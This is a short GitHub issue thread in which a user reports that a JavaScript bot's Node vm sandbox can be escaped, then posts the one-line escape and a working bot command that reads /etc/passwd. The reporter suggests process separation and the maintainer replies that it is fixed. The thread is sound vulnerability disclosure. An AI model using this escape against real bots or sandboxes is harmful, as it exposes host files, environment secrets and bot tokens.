### ISSUE TITLE
vm bypass vulnerability

### ISSUE THREAD

**Issue by sovietspaceship2** [userbq201/js-bot#1]
node's vm sandbox is easy to bypass with one line of js, please fix)

**Comment by sovietspaceship2** [comment]
the process running js code should be separate from the process managing the bot, so the former can never access the token and can be given no privileges except for interprocess communication with the other node instance

**Comment by sovietspaceship2** [comment]
the code I used to bypass the vm is

```
this.constructor.constructor('return process')()
```

which returns the `process` object, with the usual properties e.g. `process.mainModule` from which you can require, `process.env`, etc.


working example:
```
!code console.log(this.constructor.constructor('return process')().mainModule.require('fs').readFileSync('/etc/passwd').toString())
```

**Comment by dmitryshelomanov** [comment]
fixed :grinning:
